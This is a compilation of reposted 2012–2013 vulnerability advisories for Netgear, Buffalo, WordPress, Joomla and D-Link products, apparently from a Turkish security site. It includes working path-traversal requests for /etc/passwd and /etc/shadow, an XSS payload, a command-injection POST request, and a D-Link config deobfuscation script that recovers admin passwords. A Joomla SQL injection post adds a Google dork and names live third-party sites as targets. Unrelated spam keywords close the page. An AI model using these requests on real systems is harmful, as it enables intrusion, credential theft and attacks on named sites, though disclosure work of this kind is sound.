Netgear SPH200D Multiple Vulnerabilities

Netgear SPH200D Multiple Vulnerabilities

Device Name: SPH200D
Vendor: Netgear
 
============ Vulnerable Firmware Releases: ============
 
Firmware Version : 1.0.4.80
Kernel Version : 4.1-18
Web Server Version : 1.5
 
============ Device Description: ============/product/SPH200D
 
============ Shodan Torks ============
 
Shodan Search: SPH200D
=> Results 337 devices
 
============ Vulnerability Overview: ============
 
* directory traversal:
 
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
 
Request:
http://192.168.178.103/../../etc/passwd
 
Response:
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
 
root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash
 
 
 
If you request a directory you will get a very nice directory listing for browsing through the filesystem:
/../../var/
 
HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
 
<H1>Index of ../../var/</H1>
 
<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>
 
So with this information you are able to access the skype configuration with the following request:
/../../var/.Skype/<user>/config.xml
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png
 
* For changing the current password there is no request to the current password
 
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
 
* local path disclosure:
 
Request:
http://192.168.178.103/%3C/
 
Response:
The requested URL '/var/htdocs/%3C/' was not found on this server.
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png
 
 
* reflected Cross Site Scripting
 
Appending scripts to the URL reveals that this is not properly validated for malicious input.
http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502f
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png
 
 
============ Solution ============
 
No known solution available.
 
============ Credits ============
 
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-002
Twitter: @s3cur1ty_de
 
============ Time Line: ============
 
August 2012 - discovered vulnerability
07.08.2012 - reported vulnerability to Netgear
08.08.2012 - case closed by Netgear
29.01.2013 - public release
 
===================== Advisory end =====================

Buffalo TeraStation TS-Series – Multiple Vulnerabilities

Buffalo TeraStation TS-Series – Genel Açıkları

**************************************************************
Title: Buffalo TeraStation TS-Series multiple vulnerabilities
Version affected: firmware version <= 1.5.7
Vendor: http://www.buffalotech.com/products/network-storage
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Buffalo's TeraStation network attached storage (NAS) solutions offer
centralized storage and backup for home, small office and business
needs.

The firmware is based on Linux ARM and most of the internal software
is written using Perl.

The vulnerabilities that I found allows any unauthenticated attacker
to access arbitrary files on the NAS filesystem and execute system
commands with root privileges.

Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with
the latest firmware installed (v1.57). Surely other versions with the
same firmware are vulnerable.

1]======== sync.cgi unauthenticated arbitrary file download ========
Requesting an unprotected cgi, it's possible, for an unauthenticated
user, to download any system file, included /etc/shadow, that contains
the password shadows for the application/system users.

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow

Moreover, using the key "all" it's possible to download the entire
/var/log directory:

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all

2]======== dynamic.pl NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.

This is a sample request:
#####################################
POST /dynamic.pl HTTP/1.1
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0

bufaction=setDTSettings&dateMethod=on
&ip=www.google.it%26%26[COMMAND]>/tmp/output
&syncFreq=1d
#####################################

It's possible to view the command output using the previous
vulnerability (reading the /tmp/output file).

WordPress plugin Attack Scanner Bypass vulnerability

WordPress plugin Attack Scanner Bypass açığına işişkin açıklamalar şu şekilde;

 want to warn you about security vulnerabilities in WordPress Attack Scanner plugin for WordPress.

These are Information Leakage vulnerabilities. This is security plugin. In my 63 advisories about different vulnerabilities in WordPress plugins (http://websecurity.com.ua/3397/) I've wrote about security plugins many times. Previous time it was plugin Wordfence Security.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of WordPress Attack Scanner - both Free and Pro (commercial) versions of the plugin. Checked in WP-Attack-Scanner-Free 0.9.5.beta.

----------
Details:
----------

Information Leakage (WASC-13):

http://site/wp-content/plugins/path/data.txt

http://site/wp-content/plugins/path/archive.txt

Folder "path" can be WP-Attack-Scanner or WP-Attack-Scanner-Free.

Unrestricted access to the data - they can be accessed in the browser without authorization. Even the data is encrypted, but by default the password is "changepassword". If the password was not changed, then the data is easily decrypting. If it was changed, then the password can be picked up.

------------
Timeline:
------------
2012.10.29 - announced at my site.
2012.11.03 - informed developers (at one e-mail).
2012.11.04 - informed developers (at another e-mail).
2013.01.29 - disclosed at my site (http://websecurity.com.ua/6120/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site

Joomla Component – smartshop SQL Injection Vulnerability

Joomla Component – smartshop eklentisinde SQL Injection SQL açığı bulunmuş olup, Açığın oluşum yeri ve açık hakkında açık bulucunun bilgilendirmesi aşağıda yer almaktadır.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-------------------------------------------------------------------
Joomla Component - smartshop SQL Injection Vulnerability 
-------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"com_smartshop"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ...
------------------
 
#=> SQL Injection 
 
http://[target]/[path]/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=[ID]&catid=[ID]&product_id=25'[inj3ct h3re]
 
------------------------------
 
#=> Demos :
 
http://www.aktenvernichter.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=1&catid=12&product_id=242
 
http://www.destructeurs.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=147&catid=4&product_id=35

D-Link DCS Cameras Authentication Bypass / Command Execution

D-Link DCS Cameras Authentication Bypass / Command Execution Açığı ve kullanımanı ilişkin exploit yayınlanmış olup ayrıntılı açıklaması aşağıda yer almaktadır.

Unauthenticated remote access to D-Link DCS cameras
===================================================
 
[ADVISORY INFORMATION]
Title:    Unauthenticated remote access to D-Link DCS cameras
Discovery date: 20/06/2012
Release date:   28/01/2013
Credits:        Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)
 
[VULNERABILITY INFORMATION]
Class:           Authentication bypass, Remote command execution
 
[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* D-Link DCS-930L, firmware version 1.04
* D-Link DCS-932L, firmware version 1.02
Other products and firmware versions are probably also vulnerable, but they
were not checked.
 
[VULNERABILITY DETAILS]
D-Link DCS web cameras allow unauthenticated attackers to obtain the
configuration of the device remotely. A copy of the device configuration can be
obtained by accessing the following URL:
 
http://<device IP address>/frame/GetConfig
 
The obtained configuration file is obfuscated using a trivial obfuscation
scheme. Python code for the deobfuscation follows (sorry, the code is quite a
mess :-)):
 
<cut>
# 'data' holds the content of the obfuscated configuration file
def deobfuscate(data):
r = []
for c in data:
c = ord(c)
c = (c + ord('y')) & 0xff
c = (c ^ ord('Z')) & 0xff
c = (c - ord('e')) & 0xff
r.append(c)
 
tmp = None
i = len(r) - 1
while i >= 0:
if i == len(r) - 1:
x = r[i]
tmp = ((x & 7) << 5) & 0xff
 
if i == 0:
assert tmp is not None
x = r[0]
x = (x >> 3) & 0xff
x = (x + tmp) & 0xff
r[0] = x
else:
c1 = r[i-1]
c2 = r[i]
c1 = c1 & 0x7
c2 = (c2 >> 3) & 0xff
c1 = (c1 << 5) & 0xff
c2 = (c2 + c1) & 0xff
r[i] = c2
i = i - 1
 
r = "".join([chr(x) for x in r])
 
s = ""
assert (len(r) % 2) == 0
for i in range(len(r)/2):
s += r[i+(len(r)/2)] + r[i]
 
return s
</cut>
 
The above procedure returns the deobfuscated ASCII version of the
configuration file. This file includes, among other things, also the web
password for the "admin" user.
 
As a side note, it is worth considering that, after exploiting this issue,
authenticated attackers can also leverage the undocumented /docmd.htm web page
to execute arbitrary commands on the affected devices.
 
[REMEDIATION]
This issue has been addressed by D-Link in the following firmware releases:
* DCS-930L V1.06B5 (August 15, 2012)
* DCS-932L V1.04B5 (August 15, 2012)
 
These updates are available through mydlink.com and have also been implemented
on DCS-942L and higher camera products.
 
[DISCLOSURE TIME-LINE]
* 20/06/2012 - Initial vendor contact.
 
* 11/07/2012 - The author provided D-Link with the details of the
vulnerability.
 
* 12/07/2012 - D-Link confirmed the issue is a new security vulnerability.
 
* 26/01/2013 - D-Link confirmed the release of firmware versions that
address the vulnerability.
 
* 28/01/2013 - Public disclosure.
 
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
ikinci el eşya alan yerler | ikinci el eşya alanlar
maltepe evden eve nakliyat ikinci el kol saati alanlar